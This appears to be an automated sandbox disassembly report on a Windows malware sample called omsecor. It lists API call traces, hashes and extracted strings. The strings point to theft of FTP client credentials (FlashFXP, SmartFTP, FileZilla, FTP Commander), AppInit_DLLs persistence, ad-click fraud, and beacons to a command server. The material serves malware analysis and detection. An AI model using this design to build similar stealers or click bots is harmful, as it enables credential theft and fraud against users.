                          • API String ID: 1635188419-1322549247
                          • Opcode ID: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
                          • Instruction ID: 36c1d9bdffb8f00438c4566312b7f03f9c346fdcff82922ab75e5f9c351e1c12
                          • Opcode Fuzzy Hash: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
                          • Instruction Fuzzy Hash: 3581B0B15043819FD721EF29C840A6BBBE5AFC9304F14497EFA84A32D1E738D945CB5A
                          APIs
                          • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00407374
                          • GetLocalTime.KERNEL32(?), ref: 00407387
                          • GetLocalTime.KERNEL32(?), ref: 0040738D
                          • GetTimeZoneInformation.KERNEL32(?), ref: 004073C2
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407412
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040741C
                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00989680,00000000), ref: 0040747A
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00989680,00000000), ref: 00407485
                          • CloseHandle.KERNEL32(?,?,?,00989680,00000000), ref: 0040748E
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$FileLocalSystemTimerWaitable$CloseCreateHandleInformationObjectSingleWaitZone
                          • String ID:
                          • API String ID: 3166187867-0
                          • Opcode ID: 2667820b8e72ac86daf0972410128220eb63d60d64ca4213cefa209fb62143e0
                          • Instruction ID: 26b14636c49f8a61fb06fac8b942a3fa68f3078aba47330515a101c34858e503
                          • Opcode Fuzzy Hash: 2667820b8e72ac86daf0972410128220eb63d60d64ca4213cefa209fb62143e0
                          • Instruction Fuzzy Hash: 8B316FB2D1022DAACF04EBE5DD459EEB7BDEF44304F10406AF901B3290E7746A04DB69
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID:
                          • String ID: http$+@
                          • API String ID: 0-4127549746
                          • Opcode ID: f0dce942b3145dcad46720e365100d861664f6bcad1e9537a21da11c1cc3beb0
                          • Instruction ID: 8803294073e7eabf7739078d3f203694aecc40311bc63510a67c123621be67c8
                          • Opcode Fuzzy Hash: f0dce942b3145dcad46720e365100d861664f6bcad1e9537a21da11c1cc3beb0
                          • Instruction Fuzzy Hash: 5CA17DB1A00519DFDF00DFA5C984AAEB7B5FF89305B14486AE845FB290DB34AD41CFA4
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004037AD
                          • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 00403804
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: EnvironmentExpandFolderOpenPathStrings
                          • String ID: #$&$*flashfxp*$SOFTWARE\FlashFXP\3$datafolder
                          • API String ID: 1994525040-4055253781
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 004099EB
                          • SysAllocString.OLEAUT32(?), ref: 004099F9
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: </domain>$</url>$<domain>$<url>$http://
                          • API String ID: 2525500382-924421446
                          APIs
                          • SysFreeString.OLEAUT32(75C0F6A0), ref: 00408F82
                          • SysFreeString.OLEAUT32(0000000B), ref: 00409046
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID:
                          • API String ID: 3341692771-0
                          APIs
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • Sleep.KERNEL32(00002710,00000000,00000400,00000000), ref: 0040ACAE
                          • Sleep.KERNEL32(0000EA60), ref: 0040AD76
                          • Sleep.KERNEL32(00002710), ref: 0040ADA4
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep$AttemptConnectInternet
                          • String ID: 0$^rcn=1$d$hOA$job^rev=%s^os=%s
                          • API String ID: 362191241-2593661552
                          APIs
                          • _ValidateScopeTableHandlers.LIBCMT ref: 0040D892
                          • __FindPESection.LIBCMT ref: 0040D8AC
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FindHandlersScopeSectionTableValidate
                          • String ID:
                          • API String ID: 876702719-0
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004088E4
                          • SysFreeString.OLEAUT32(?), ref: 004088E9
                          • SysFreeString.OLEAUT32(?), ref: 004089D3
                          • SysFreeString.OLEAUT32(?), ref: 004089D8
                          • SysFreeString.OLEAUT32(?), ref: 004089F3
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID: +@
                          • API String ID: 3341692771-3835504741
                          APIs
                          • Sleep.KERNEL32(00002710,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402566
                          • DeleteFileW.KERNEL32(00000000,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402587
                          • Sleep.KERNEL32(0000EA60,00000000,00000001,00000000,00000000), ref: 004025B3
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • _memset.LIBCMT ref: 004025DA
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00420840,?,?,?,?,?,00000000,00000001,00000000), ref: 0040264D
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep$AttemptConnectCreateDeleteFileInternetProcess_memset
                          • String ID: none
                          • API String ID: 2353737338-2140143823
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004094E6
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID:
                          • API String ID: 3341692771-0
                          APIs
                          • _memset.LIBCMT ref: 0040A26B
                          • SysAllocString.OLEAUT32(?), ref: 0040A28E
                          • SysAllocString.OLEAUT32(?), ref: 0040A296
                          • SysFreeString.OLEAUT32(00000000), ref: 0040A2CA
                          • SysFreeString.OLEAUT32(?), ref: 0040A2CF
                            • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FCE
                            • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FDE
                            • Part of subcall function 00409FB1: Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                            • Part of subcall function 00409FB1: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                            • Part of subcall function 00409FB1: DispatchMessageW.USER32(?), ref: 0040A009
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: String$AllocCountFreeMessageTick$DispatchPeekSleep_memset
                          • String ID: J(@
                          • API String ID: 3143865713-2848800318
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,00000001,?,?,00000000), ref: 00408628
                          • GetLastError.KERNEL32(?,00000000), ref: 0040864A
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          • DeleteFileW.KERNEL32(C:\WINDOWS\system32\gbdwpbm.dll,?,00000000), ref: 00408687
                            • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CloseCreateDeleteErrorFileLastOpenQueryValue
                          • String ID: AppInit_DLLs$C:\WINDOWS\system32\gbdwpbm.dll$Software\Microsoft\Windows NT\CurrentVersion\Windows
                          • API String ID: 4026185228-3265104503
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 00409B00
                          • SysAllocString.OLEAUT32(?), ref: 00409B0E
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: </title>$</url>$<title>$<url>
                          • API String ID: 2525500382-2286408829
                          APIs
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • Sleep.KERNEL32(00002710,?,?,?,?,00402C8F,00000032,00000000,00000000,00000000,00000000,?), ref: 0040A91C
                          • Sleep.KERNEL32(00002710), ref: 0040AAC1
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AAE9
                          • HeapFree.KERNEL32(00000000), ref: 0040AAF0
                          Strings
                          • jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s, xrefs: 0040A957
                          • 0, xrefs: 0040AA5B
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: HeapSleep$AttemptConnectFreeInternetProcess
                          • String ID: 0$jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
                          • API String ID: 3713053250-1268808612
                          APIs
                          • GetLocalTime.KERNEL32(?,?), ref: 004074AD
                          • GetLocalTime.KERNEL32(00000000), ref: 004074B3
                          • GetTimeZoneInformation.KERNEL32(?), ref: 004074EA
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407525
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040752F
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040754A
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$FileLocalSystem$InformationUnothrow_t@std@@@Zone__ehfuncinfo$??2@
                          • String ID:
                          • API String ID: 3777474486-0
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004083DC
                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 004083EF
                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00408417
                          • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040842F
                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00408449
                          • CloseHandle.KERNEL32(?), ref: 00408452
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 1974014688-0
                          APIs
                          • InternetConnectW.WININET(?,00000050,00000000,00000000,00000003,00000000,00000000,?), ref: 00409EA3
                          • HttpOpenRequestW.WININET(00000000,POST,04400100,00000000,00000000,00000000,04400100,00000000), ref: 00409EC3
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 00409EDA
                          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409F00
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: HttpInternetRequest$ConnectFileOpenReadSend
                          • String ID: POST
                          • API String ID: 961146071-1814004025
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,?,00000008), ref: 004051EB
                          Strings
                          • SOFTWARE\smartftp\client 2.0\settings\general\favorites, xrefs: 00405157
                          • folder, xrefs: 00405184
                          • SOFTWARE\smartftp\client 2.0\settings\backup, xrefs: 00405168
                          • personal favorites, xrefs: 00405176
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: EnvironmentExpandOpenStrings
                          • String ID: SOFTWARE\smartftp\client 2.0\settings\backup$SOFTWARE\smartftp\client 2.0\settings\general\favorites$folder$personal favorites
                          • API String ID: 3923277744-821743658
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 0040A0C0
                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                          • CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CreateHandleInitializeModuleWindow
                          • String ID: AtlAxWin$Shell.Explorer
                          • API String ID: 950422046-1300462704
                          APIs
                          • GetSystemTime.KERNEL32(?,?,000003E8,?,?,?,?,?,?,?,?,?,?,?,00407B63,?), ref: 0040727C
                          • SystemTimeToFileTime.KERNEL32(?,?,?,000003E8,?), ref: 004072C1
                          • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 004072CB
                          • __aulldiv.LIBCMT ref: 004072E3
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$System$File$__aulldiv
                          • String ID: c{@
                          • API String ID: 3735792614-264719814
                          APIs
                          • GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040286E), ref: 004072F9
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00407337
                          • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00407341
                          • __aulldiv.LIBCMT ref: 00407359
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$System$File$__aulldiv
                          • String ID: n(@
                          • API String ID: 3735792614-2525614082
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040AB93
                          • CharLowerW.USER32(?), ref: 0040ABA0
                          • GetCommandLineW.KERNEL32 ref: 0040ABC0
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CharCommandFileLineLowerModuleName
                          • String ID: /updatefile3$netprotdrvss.exe
                          • API String ID: 3118597399-3449771660
                          APIs
                          • GetTickCount.KERNEL32 ref: 00409FCE
                          • GetTickCount.KERNEL32 ref: 00409FDE
                          • Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                          • DispatchMessageW.USER32(?), ref: 0040A009
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountMessageTick$DispatchPeekSleep
                          • String ID:
                          • API String ID: 4159783438-0
                          APIs
                          • GetTickCount.KERNEL32 ref: 00409F5B
                          • GetTickCount.KERNEL32 ref: 00409F5F
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                          • DispatchMessageW.USER32(?), ref: 00409F80
                          • Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountMessageTick$DispatchPeekSleep
                          • String ID:
                          • API String ID: 4159783438-0
                          • Opcode ID: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
                          • Instruction ID: 2f378a1af0056e794f94b22e0cd08b0b0b180d2e60cd5d2ebdc62f673b65dbb1
                          • Opcode Fuzzy Hash: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
                          • Instruction Fuzzy Hash: D1F0C872D042149BD714B7F2DD09B7D76A89B45714F104A36F551F70D1CA7CCD148A58
                          APIs
                            • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                            • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                            • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5B
                            • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5F
                            • Part of subcall function 00409F2B: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                            • Part of subcall function 00409F2B: DispatchMessageW.USER32(?), ref: 00409F80
                            • Part of subcall function 00409F2B: Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                          • CharLowerW.USER32(?,?,?,00423DD4,?,00000001), ref: 00408751
                          • SysFreeString.OLEAUT32(?), ref: 0040875A
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountInternetMessageTick$CharDispatchFreeLowerOpenOptionPeekSleepString
                          • String ID: http://$+@
                          • API String ID: 147727044-3628382792
                          • Opcode ID: a6511d5d8b0c810daf140c5c911559c37a96c1275369982660b5569d586a1c5f
                          • Instruction ID: 305e6509dfdc939f3ffb47eba37a7af79922f54013ecb7534e3961c93d2e4cc1
                          • Opcode Fuzzy Hash: a6511d5d8b0c810daf140c5c911559c37a96c1275369982660b5569d586a1c5f
                          • Instruction Fuzzy Hash: 4E41D5729002199BCF15AF66CD056EFBBB4FF44314F20447FE981B3292DB3889528B99
                          APIs
                          • SetFilePointer.KERNEL32(00414F68,00000000,00000000,00000000,UniqueNum,00000001), ref: 00407E09
                          • WriteFile.KERNEL32(00000078,00000064,00000001,00000000), ref: 00407E20
                            • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                            • Part of subcall function 00407CD7: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CreateModuleNamePointerWrite
                          • String ID: UniqueNum$x
                          • API String ID: 594998759-2399716736
                          • Opcode ID: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                          • Instruction ID: 8c5cde1ed6458afa5e70834db293a7f07ca8c6efd1b8e13f0da2095665a79c5a
                          • Opcode Fuzzy Hash: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                          • Instruction Fuzzy Hash: F72129329002186BDF04AB74ED49DDF3B69EF44315F104636FA02E71E1E634D951C799
                          APIs
                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040413A
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: #$&$*filezilla*
                          • API String ID: 3438805939-758400021
                          • Opcode ID: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                          • Instruction ID: af0dd5899ef73ee7264a7e51d90439c8fcf38b6470501fb51340e8e2557856c3
                          • Opcode Fuzzy Hash: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                          • Instruction Fuzzy Hash: 8E1151B2901128BADB10EA92DC49EDF7BBCEF85304F00407AF605B6080E7385785CBE9
                          APIs
                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 00404AE5
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: #$&$ftp*commander*
                          • API String ID: 3438805939-1149875651
                          • Opcode ID: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                          • Instruction ID: 4761086559ade70d73b1403ca51e5d3bc462c500c99379e4fd01d7d946a964d6
                          • Opcode Fuzzy Hash: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                          • Instruction Fuzzy Hash: B61121B2901118BADB10AA92DC49EDF7F7CEF85704F00407AF609B6180E7799785CBA9
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004094A9
                          • SysFreeString.OLEAUT32(?), ref: 004094AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID: _blank$an.yandex.ru/count
                          • API String ID: 3341692771-25359924
                          • Opcode ID: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                          • Instruction ID: 1eacecae91598e8b756cf85833a4a3bbf756f1dfdfc5fa02fd6c22f827bf3b29
                          • Opcode Fuzzy Hash: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                          • Instruction Fuzzy Hash: 28015A35204114BBDB109FA6CD05D9B77A8EF85324724443BBC15E7291E779EE02CA69
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 00409868
                          • SysAllocString.OLEAUT32(?), ref: 00409876
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: "URL"$"encrypted"
                          • API String ID: 2525500382-4151690107
                          • Opcode ID: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                          • Instruction ID: 961e294ab5ae80d7ab2f0271a6faa46f3ea3f555f1d55132cdad114d364c87da
                          • Opcode Fuzzy Hash: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                          • Instruction Fuzzy Hash: 62F0D671A0021DA7CF00AB69CC01FD637ECAB4438CF1484B6F904F32C1E974EA098B98
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 004097ED
                          • SysAllocString.OLEAUT32(?), ref: 004097FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: "domain"$"url"
                          • API String ID: 2525500382-2438671658
                          • Opcode ID: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                          • Instruction ID: 610bf4d9b2292206f8ef054453b19a236663fc5a2da35db14ea77673b97cd822
                          • Opcode Fuzzy Hash: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
